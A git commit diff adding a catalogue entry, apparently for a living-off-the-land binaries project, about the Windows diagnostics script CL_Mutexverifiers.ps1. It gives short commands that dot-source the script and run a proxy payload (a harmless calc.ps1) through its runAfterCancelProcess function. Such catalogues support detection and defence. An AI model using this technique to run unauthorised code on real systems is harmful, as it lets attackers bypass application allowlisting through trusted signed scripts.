Create CL_mutexverifiers.md
parent
207d8bf0c1
commit
6ba8884a25
|
@ -0,0 +1,46 @@
|
||||||
|
## CL_Mutexverifiers.ps1
|
||||||
|
|
||||||
|
* Functions: Execute
|
||||||
|
|
||||||
|
```
|
||||||
|
. C:\Windows\diagnostics\system\AERO\CL_Mutexverifiers.ps1
|
||||||
|
runAfterCancelProcess calc.ps1
|
||||||
|
```
|
||||||
|
```
|
||||||
|
. C:\Windows\diagnostics\system\Audio\CL_Mutexverifiers.ps1
|
||||||
|
runAfterCancelProcess calc.ps1
|
||||||
|
```
|
||||||
|
```
|
||||||
|
. C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1
|
||||||
|
runAfterCancelProcess calc.ps1
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
Acknowledgements:
|
||||||
|
* Pierre-Alexandre Braeken @pabraeken (Audio + WindowsUpdate)
|
||||||
|
|
||||||
|
Resources:
|
||||||
|
* https://twitter.com/pabraeken/status/995111125447577600
|
||||||
|
|
||||||
|
Full path:
|
||||||
|
```
|
||||||
|
C:\Windows\diagnostics\system\WindowsUpdate\CL_Mutexverifiers.ps1
|
||||||
|
```
|
||||||
|
```
|
||||||
|
C:\Windows\diagnostics\system\Video\CL_Mutexverifiers.ps1
|
||||||
|
```
|
||||||
|
```
|
||||||
|
C:\Windows\diagnostics\system\Speech\CL_Mutexverifiers.ps1
|
||||||
|
```
|
||||||
|
|
||||||
|
Notes:
|
||||||
|
calc.ps1 must be created in $env:temp
|
||||||
|
|
||||||
|
calc.ps1 content
|
||||||
|
```
|
||||||
|
calc
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
Loading…
Reference in New Issue